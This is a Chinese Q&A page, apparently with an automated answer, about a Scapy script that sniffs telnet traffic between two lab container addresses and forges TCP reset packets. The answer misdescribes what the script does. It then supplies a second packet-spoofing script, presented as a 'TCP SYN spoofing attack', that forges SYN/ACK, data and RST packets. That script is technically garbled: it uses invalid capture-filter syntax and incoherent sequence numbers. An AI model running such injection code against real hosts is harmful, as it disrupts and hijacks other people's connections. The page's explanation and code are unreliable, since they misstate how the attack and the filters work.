#!/usr/bin/python3 from scapy.all import* SRC = "172.17.0.2" DST = "172.17.0.3" PORT = 23 def spoof(pkt): old_tcp = pkt[TCP] old_ip = pkt[IP] if(old_tcp.flags=="R"): return ########################################################################### ip = IP(src = old_ip.dst, dst = old_ip.src) tcp = TCP(sport = old_tcp.dport, dport = old_tcp.sport, seq = old_tcp.seq,flags = "R") ########################################################################### pkt = ip/tcp send(pkt, verbose=0) print("Spoofed Packet: {} --> {}".format(ip.src, ip.dst)) f = 'tcp and src host {} and dst host {} and dst port {}'.format(SRC, DST, PORT) sniff(filter=f, prn=spoof) 帮忙看一下这个代码的问题
时间: 2024-01-11 18:04:24 浏览: 143
这段代码的问题在于,它只是对接收到的 TCP RST 包进行了响应,而没有实现 TCP SYN 包的欺骗。
因此,如果您的目标是使用 Scapy 实现 TCP SYN 欺骗攻击,您需要修改代码以实现以下操作:
1. 捕获发送到目标 IP 地址和端口的 TCP SYN 包。
2. 构造一个 TCP SYN/ACK 响应包并发送到源 IP 地址和端口。
3. 等待目标设备发送一个 ACK 包作为响应。
4. 在收到 ACK 包后,您可以选择继续发送数据包,或者关闭连接。
您可以参考以下代码示例来实现 TCP SYN 欺骗攻击:
```
#!/usr/bin/python3
from scapy.all import*
SRC = "172.17.0.2"
DST = "172.17.0.3"
PORT = 23
def spoof(pkt):
old_tcp = pkt[TCP]
old_ip = pkt[IP]
# 捕获目标设备发送的TCP SYN包
if old_tcp.flags == "S":
print("Received TCP SYN packet from {}".format(old_ip.src))
# 构造TCP SYN/ACK响应包
ip = IP(src = DST, dst = old_ip.src)
tcp = TCP(sport = PORT, dport = old_tcp.sport, seq = 12345, ack = old_tcp.seq + 1, flags = "SA")
pkt = ip/tcp
# 发送TCP SYN/ACK响应包
send(pkt, verbose = 0)
print("Sent TCP SYN/ACK packet to {}".format(old_ip.src))
# 等待目标设备发送ACK包
f = 'tcp and src host {} and dst host {} and dst port {} and tcp.flags==0x10'.format(old_ip.src, DST, PORT)
ack_pkt = sniff(filter = f, count = 1)
# 发送数据包或关闭连接
if ack_pkt:
print("Received ACK packet from {}".format(old_ip.src))
# 发送数据包
data_pkt = IP(dst = old_ip.src)/TCP(sport = PORT, dport = old_tcp.sport, flags = "PA")/"Hello, world!"
send(data_pkt, verbose = 0)
print("Sent data packet to {}".format(old_ip.src))
else:
# 关闭连接
print("Failed to receive ACK packet from {}".format(old_ip.src))
rst_pkt = IP(dst = old_ip.src)/TCP(sport = PORT, dport = old_tcp.sport, flags = "R")
send(rst_pkt, verbose = 0)
print("Sent RST packet to {}".format(old_ip.src))
# 捕获TCP SYN包
f = 'tcp and src host {} and dst host {} and dst port {} and tcp.flags==0x02'.format(SRC, DST, PORT)
sniff(filter = f, prn = spoof)
```
请注意,TCP SYN 欺骗攻击可能违反法律法规,因此请务必遵守当地法律法规并仅用于合法目的。
阅读全文